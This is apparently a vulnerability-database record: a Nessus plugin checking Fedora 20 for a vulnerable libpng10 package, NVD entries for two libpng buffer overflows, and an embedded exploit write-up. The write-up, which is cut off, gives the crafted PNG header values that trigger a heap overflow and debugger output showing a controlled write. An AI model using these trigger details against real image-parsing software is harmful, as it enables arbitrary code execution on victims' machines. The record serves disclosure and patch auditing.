ID FEDORA_2015-2830.NASL Type nessus Reporter Tenable Modified 2015-10-19T00:00:00
Description
This update addresses a couple of buffer overflows that might allow context-dependent attackers to execute arbitrary code via very wide PNG images.
Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2015-2830.
#
include("compat.inc");
if (description)
{
script_id(81711);
script_version("$Revision: 1.4 $");
script_cvs_date("$Date: 2015/10/19 23:06:17 $");
script_cve_id("CVE-2014-9495", "CVE-2015-0973");
script_bugtraq_id(71820, 71994);
script_xref(name:"FEDORA", value:"2015-2830");
script_name(english:"Fedora 20 : libpng10-1.0.63-1.fc20 (2015-2830)");
script_summary(english:"Checks rpm output for the updated package.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"This update addresses a couple of buffer overflows that might allow
context-dependent attackers to execute arbitrary code via very wide
PNG images.
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.redhat.com/show_bug.cgi?id=1177327"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.redhat.com/show_bug.cgi?id=1179186"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151242.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?95ab3c01"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected libpng10 package."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:libpng10");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:20");
script_set_attribute(attribute:"patch_publication_date", value:"2015/02/28");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/03/10");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2015 Tenable Network Security, Inc.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^20([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 20.x", "Fedora " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
flag = 0;
if (rpm_check(release:"FC20", reference:"libpng10-1.0.63-1.fc20")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "libpng10");
}
{"published": "2015-03-10T00:00:00", "id": "FEDORA_2015-2830.NASL", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [{"differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:08", "bulletin": {"enchantments": {}, "published": "2015-03-10T00:00:00", "id": "FEDORA_2015-2830.NASL", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [], "cpe": [], "hash": "4e39a4dc92d5442e4fc55f7f142aeab4f64cd3fd0c7bb5579a931263071070e3", "description": "This update addresses a couple of buffer overflows that might allow context-dependent attackers to execute arbitrary code via very wide PNG images.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "type": "nessus", "pluginID": "81711", "lastseen": "2016-09-26T17:23:08", "edition": 1, "title": "Fedora 20 : libpng10-1.0.63-1.fc20 (2015-2830)", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81711", "modified": "2015-10-19T00:00:00", "bulletinFamily": "scanner", "viewCount": 0, "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "references": ["http://www.nessus.org/u?95ab3c01", "https://bugzilla.redhat.com/show_bug.cgi?id=1177327", "https://bugzilla.redhat.com/show_bug.cgi?id=1179186"], "naslFamily": "Fedora Local Security Checks", "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-2830.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81711);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:17 $\");\n\n script_cve_id(\"CVE-2014-9495\", \"CVE-2015-0973\");\n script_bugtraq_id(71820, 71994);\n script_xref(name:\"FEDORA\", value:\"2015-2830\");\n\n script_name(english:\"Fedora 20 : libpng10-1.0.63-1.fc20 (2015-2830)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses a couple of buffer overflows that might allow\ncontext-dependent attackers to execute arbitrary code via very wide\nPNG images.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1177327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1179186\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151242.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?95ab3c01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libpng10 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"libpng10-1.0.63-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng10\");\n}\n", "hashmap": [{"hash": "ca0af736bc7fb2d8ed4156db62e47588", "key": "sourceData"}, {"hash": "52d2e83ffbd61109b6ad62c46427c1c6", "key": "description"}, {"hash": "f62fe2bf825bb2fbdd2cd3f59be82fce", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "30eb0497fde81a1ae19b9345feec2edc", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "198201ef7b1aaf8bbf6499e08f2c1f46", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "7a4b67a56498caf8baae5c2473e3ff02", "key": "pluginID"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "e402cbbdb6b86150a6bb4c1858f0dfa5", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "546e75420600894b502d9c15313e4f1a", "key": "references"}], "objectVersion": "1.2"}}], "description": "This update addresses a couple of buffer overflows that might allow context-dependent attackers to execute arbitrary code via very wide PNG images.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "hash": "f6365a2f54ef47be82bab25767966b95ae40e2a815f93234ab21fef239f2dc1d", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "type": "nessus", "pluginID": "81711", "lastseen": "2017-10-29T13:33:18", "edition": 2, "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:libpng10"], "title": "Fedora 20 : libpng10-1.0.63-1.fc20 (2015-2830)", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81711", "modified": "2015-10-19T00:00:00", "bulletinFamily": "scanner", "viewCount": 0, "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "references": ["http://www.nessus.org/u?95ab3c01", "https://bugzilla.redhat.com/show_bug.cgi?id=1177327", "https://bugzilla.redhat.com/show_bug.cgi?id=1179186"], "naslFamily": "Fedora Local Security Checks", "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-2830.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81711);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:17 $\");\n\n script_cve_id(\"CVE-2014-9495\", \"CVE-2015-0973\");\n script_bugtraq_id(71820, 71994);\n script_xref(name:\"FEDORA\", value:\"2015-2830\");\n\n script_name(english:\"Fedora 20 : libpng10-1.0.63-1.fc20 (2015-2830)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses a couple of buffer overflows that might allow\ncontext-dependent attackers to execute arbitrary code via very wide\nPNG images.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1177327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1179186\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151242.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?95ab3c01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libpng10 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"libpng10-1.0.63-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng10\");\n}\n", "hashmap": [{"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "9953a1a7a14134432bcf9b6d046287ab", "key": "cpe"}, {"hash": "198201ef7b1aaf8bbf6499e08f2c1f46", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "52d2e83ffbd61109b6ad62c46427c1c6", "key": "description"}, {"hash": "30eb0497fde81a1ae19b9345feec2edc", "key": "href"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "7a4b67a56498caf8baae5c2473e3ff02", "key": "pluginID"}, {"hash": "f62fe2bf825bb2fbdd2cd3f59be82fce", "key": "published"}, {"hash": "546e75420600894b502d9c15313e4f1a", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "ca0af736bc7fb2d8ed4156db62e47588", "key": "sourceData"}, {"hash": "e402cbbdb6b86150a6bb4c1858f0dfa5", "key": "title"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}], "objectVersion": "1.3"}
{"result": {"cve": [{"lastseen": "2017-04-18T15:56:01", "references": ["http://sourceforge.net/p/png-mng/mailman/message/33173461/", "http://www.openwall.com/lists/oss-security/2015/01/10/1", "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html", "http://tfpwn.com/files/libpng_heap_overflow_1.6.15.txt", "http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html", "http://www.openwall.com/lists/oss-security/2015/01/10/3", "https://support.apple.com/HT206167"], "edition": 2, "description": "Buffer overflow in the png_read_IDAT_data function in pngrutil.c in libpng before 1.5.21 and 1.6.x before 1.6.16 allows context-dependent attackers to execute arbitrary code via IDAT data with a large width, a different vulnerability than CVE-2014-9495.", "reporter": "NVD", "published": "2015-01-18T13:59:03", "title": "CVE-2015-0973", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-0973"], "scanner": [], "modified": "2016-10-20T14:46:05", "cpe": ["cpe:/a:libpng:libpng:1.6.3:beta", "cpe:/a:libpng:libpng:1.6.6", "cpe:/a:libpng:libpng:1.6.1", "cpe:/a:libpng:libpng:1.6.1:beta", "cpe:/a:libpng:libpng:1.6.3", "cpe:/a:libpng:libpng:1.6.8:beta", "cpe:/a:libpng:libpng:1.6.11", "cpe:/a:libpng:libpng:1.5.20", "cpe:/a:libpng:libpng:1.6.11:beta", "cpe:/a:libpng:libpng:1.6.7:beta", "cpe:/a:libpng:libpng:1.6.15:beta", "cpe:/a:libpng:libpng:1.6.7", "cpe:/a:libpng:libpng:1.6.15", "cpe:/a:libpng:libpng:1.6.4", "cpe:/a:libpng:libpng:1.6.14:beta", "cpe:/o:oracle:solaris:11.2", "cpe:/a:libpng:libpng:1.6.2:beta", "cpe:/a:libpng:libpng:1.6.5", "cpe:/a:libpng:libpng:1.6.9:beta", "cpe:/a:libpng:libpng:1.6.2", "cpe:/a:libpng:libpng:1.6.0:beta", "cpe:/a:libpng:libpng:1.6.10:beta", "cpe:/a:libpng:libpng:1.6.8", "cpe:/a:libpng:libpng:1.6.13", "cpe:/a:libpng:libpng:1.6.9", "cpe:/a:libpng:libpng:1.6.4:beta", "cpe:/a:libpng:libpng:1.6.14", "cpe:/o:apple:mac_os_x:10.11.3", "cpe:/a:libpng:libpng:1.6.13:beta", "cpe:/a:libpng:libpng:1.6.0", "cpe:/a:libpng:libpng:1.6.10", "cpe:/a:libpng:libpng:1.6.12:beta"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0973", "id": "CVE-2015-0973", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-18T15:55:36", "references": ["http://sourceforge.net/p/png-mng/mailman/message/33173461/", "http://www.securitytracker.com/id/1031444", "http://www.openwall.com/lists/oss-security/2015/01/04/3", "http://www.openwall.com/lists/oss-security/2015/01/10/1", "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html", "http://www.securityfocus.com/bid/71820", "http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html", "http://www.openwall.com/lists/oss-security/2015/01/10/3", "https://support.apple.com/HT206167", "http://sourceforge.net/p/png-mng/mailman/message/33172831/"], "edition": 2, "description": "Heap-based buffer overflow in the png_combine_row function in libpng before 1.5.21 and 1.6.x before 1.6.16, when running on 64-bit systems, might allow context-dependent attackers to execute arbitrary code via a \"very wide interlaced\" PNG image.", "reporter": "NVD", "published": "2015-01-10T14:59:00", "title": "CVE-2014-9495", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-9495"], "scanner": [], "modified": "2016-10-17T23:45:18", "cpe": ["cpe:/a:libpng:libpng:1.6.3:beta", "cpe:/a:libpng:libpng:1.6.6", "cpe:/a:libpng:libpng:1.6.1", "cpe:/a:libpng:libpng:1.6.1:beta", "cpe:/a:libpng:libpng:1.6.3", "cpe:/a:libpng:libpng:1.6.8:beta", "cpe:/a:libpng:libpng:1.6.11", "cpe:/a:libpng:libpng:1.5.20:beta", "cpe:/a:libpng:libpng:1.6.11:beta", "cpe:/a:libpng:libpng:1.6.7:beta", "cpe:/a:libpng:libpng:1.6.15:beta", "cpe:/a:libpng:libpng:1.6.7", "cpe:/a:libpng:libpng:1.6.15", "cpe:/a:libpng:libpng:1.6.4", "cpe:/a:libpng:libpng:1.6.14:beta", "cpe:/a:libpng:libpng:1.6.2:beta", "cpe:/a:libpng:libpng:1.6.5", "cpe:/a:libpng:libpng:1.6.9:beta", "cpe:/a:libpng:libpng:1.6.2", "cpe:/a:libpng:libpng:1.6.0:beta", "cpe:/a:libpng:libpng:1.6.10:beta", "cpe:/a:libpng:libpng:1.6.8", "cpe:/a:libpng:libpng:1.6.13", "cpe:/a:libpng:libpng:1.6.9", "cpe:/a:libpng:libpng:1.6.4:beta", "cpe:/a:libpng:libpng:1.6.14", "cpe:/o:apple:mac_os_x:10.11.3", "cpe:/a:libpng:libpng:1.6.13:beta", "cpe:/a:libpng:libpng:1.6.0", "cpe:/a:libpng:libpng:1.6.10", "cpe:/a:libpng:libpng:1.6.12:beta"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9495", "id": "CVE-2014-9495", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-05T03:18:47", "references": [], "description": "Exploit for linux platform in category local exploits", "edition": 2, "reporter": "Alex Eubanks", "published": "2015-01-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "libpng 1.6.15 Heap Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0973"], "modified": "2015-01-24T00:00:00", "id": "1337DAY-ID-23175", "href": "https://0day.today/exploit/description/23175", "sourceData": "/*********************************\r\n* Alex Eubanks *\r\n* [email\u00a0protected] *\r\n* libpng 1.6.15 heap overflow *\r\n* 18 December 2014 *\r\n*********************************/\r\n\r\n/*************\r\n* A foreword *\r\n*************/\r\n// this bug was found with american fuzzy lop! thanks lcamtuf!\r\n/*\r\n* We will trigger a call to zlib which will decompress data from an IDAT chunk\r\n* into a heap-buffer of 48 bytes. The size of this heap-buffer does not depend\r\n* on the amount of data we decompress into it.\r\n*\r\n* In some cases, like my case (programs are wonderful creations), this may\r\n* allow for a controlled write.\r\n*\r\n* My environment is\r\n* [email\u00a0protected]:~$ uname -a\r\n* Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.63-2+deb7u2 i686 GNU/Linux\r\n*\r\n* Example code to trigger this overflow is available at the end of this post.\r\n* Simply set OVERFLOW_DATA to what you want to overflow the heap with.\r\n*/\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xb7eb4f71 in ?? () from /lib/i386-linux-gnu/i686/cmov/libc.so.6\r\n(gdb) x/i $pc\r\n=> 0xb7eb4f71: movdqu %xmm0,(%esi)\r\n(gdb) i r esi\r\nesi 0x41414141 1094795585\r\n(gdb) i r xmm0\r\nxmm0 {v4_float = {0xc, 0xc, 0xc, 0xc}, v2_double = {0x228282, 0x228282}, v16_int8 = {0x41 <repeats 16\r\ntimes>},\r\nv8_int16 = {0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141}, v4_int32 = {0x41414141, 0x41414141,\r\n0x41414141, 0x41414141}, v2_int64 = {0x4141414141414141, 0x4141414141414141},\r\nuint128 = 0x41414141414141414141414141414141}\r\n\r\n\r\n/***************\r\n* The overflow *\r\n***************/\r\n# pngrutil.c :: png_read_IDAT_data :: line 4018\r\n/*\r\n* At the time of this call,\r\n* png_ptr->zstream->avail_out = 0x20000000\r\n* png_ptr->zstream->avail_in = size of our compressed IDAT data\r\n* png_ptr->zstream->next_in = our compressed IDAT data\r\n* png_ptr->zstream->next_out = a pointer to row_buf, 31 bytes in big_row_buf\r\n*/\r\nret = inflate(&png_ptr->zstream, Z_NO_FLUSH);\r\n\r\n/*******\r\n* IHDR *\r\n*******/\r\n[0-3] = png_ptr->width // 0x20000000\r\n[4-7] = png_ptr->height // 0x00000020\r\n[8] = png_ptr->bit_depth // 0x10\r\n[9] = png_ptr->color_type // 0x06\r\n[10] = png_ptr->compression_type // 0x00\r\n[11] = png_ptr->filter_type // 0x00\r\n[12] = png_ptr->interlace_type // 0x01\r\n\r\n\r\n/*********************\r\n* png_read_IDAT_data *\r\n*********************/\r\n# pngrutil.c :: png_read_IDAT_data :: line 3941\r\nvoid /* PRIVATE */\r\npng_read_IDAT_data(png_structrp png_ptr, png_bytep output,\r\npng_alloc_size_t avail_out)\r\n\r\n/\r\n* png_bytep output\r\n* \\-> a buffer to decompress the IDAT data into\r\n* png_alloc_size_t avail_out\r\n* \\-> The size of output in bytes\r\n*/\r\n\r\n\r\n# pngrutil.c :: png_read_IDAT_data :: line 3984\r\nbuffer = png_read_buffer(png_ptr, avail_in, 0/*error*/);\r\n\r\n# pngrutil.c :: png_read_IDAT_data :: line 3989\r\npng_ptr->zstream.next_in = buffer;\r\n\r\n# pngrutil.c :: png_read_IDAT_data :: line 3946\r\npng_ptr->zstream.next_out = output;\r\n\r\n# pngrutil.c :: png_read_IDAT_data :: line 4002\r\npng_ptr->zstream.avail_out = out;\r\n\r\npngrutil.c :: png_read_IDAT_data :: line 4018\r\nret = inflate(&png_ptr->zstream, Z_NO_FLUSH);\r\n\r\n\r\n/*********************************\r\n* The call to png_read_IDAT_data *\r\n*********************************/\r\n# pngread.c :: png_read_row :: line 534\r\npng_read_IDAT_data(png_ptr, png_ptr->row_buf, row_info.rowbytes + 1);\r\n\r\n# pngrutil.c :: png_read_IDAT_data :: line 3941\r\nvoid /* PRIVATE */\r\npng_read_IDAT_data(png_structrp png_ptr, png_bytep output, png_alloc_size_t avail_out)\r\n\r\n/*****************************\r\n* deriving row_info.rowbytes *\r\n*****************************/\r\n\r\n# pngread.c :: png_read_row :: line 397\r\nrow_info.rowbytes = PNG_ROWBYTES(row_info.pixel_depth, row_info.width);\r\n\r\n/************************************\r\n* deriving row_info.rowbytes *\r\n* \\-> deriving row_info.pixel_depth *\r\n************************************/\r\n\r\n# pngread.c :: png_read_row :: line 396\r\nrow_info.pixel_depth = png_ptr->pixel_depth;\r\n\r\n// row_info.pixel_depth is set in png_handle_IHDR\r\n# pngrutil.c :: png_handle_IHDR :: line 855\r\npng_ptr->pixel_depth = (png_byte)(png_ptr->bit_depth * png_ptr->channels);\r\n\r\n// where png_ptr->bit_depth = IHDR[8], or 0x10\r\n\r\n// channels is set by the following logic based off\r\n// IHDR->color_type, or 0x6\r\nif (color_type == PNG_COLOR_TYPE_RGB) // 2\r\npng_ptr->channels = 3\r\nelse if (color_type == PNG_COLOR_TYPE_GRAY_ALPHA) // 4\r\npng_ptr->channels = 2\r\nelse if (color_type == PNG_COLOR_TYPE_RGB_ALPHA) // 6\r\npng_ptr->channels = 4\r\nelse\r\npng_ptr->channels = 1\r\n\r\n// row_info.pixel_depth = 0x10 * 4\r\n\r\n/************************************\r\n* deriving row_info.rowbytes *\r\n* \\-> deriving row_info.width *\r\n************************************/\r\n\r\n# pngread.c :: png_read_row :: line 392\r\nrow_info.width = png_ptr->iwidth; /* NOTE: width of current interlaced row */\r\n\r\n// png_ptr->iwidth is set in png_read_start_row\r\n// cliff notes here are, during the first interlace pass, width will be\r\n// divided by 8, so 0x20000000 becomes 0x4000000\r\n// actual computation is ((0x20000000 + 8 - 1 - 0) / 8)\r\n# pngrutil.c :: png_read_start_row :: line 4217\r\npng_ptr->iwidth = (png_ptr->width + // png_ptr->width = 0x20000000\r\npng_pass_inc[png_ptr->pass] - 1 -\r\npng_pass_start[png_ptr->pass]) /\r\npng_pass_inc[png_ptr->pass];\r\n\r\n// png_ptr->iwidth = 0x4000000\r\n\r\n\r\n// back to our original call for row_info.rowbytes\r\n# pngread.c :: png_read_row :: line 397\r\nrow_info.rowbytes = PNG_ROWBYTES(row_info.pixel_depth, row_info.width);\r\n\r\n# pngpriv.h :: line 659\r\n/* Added to 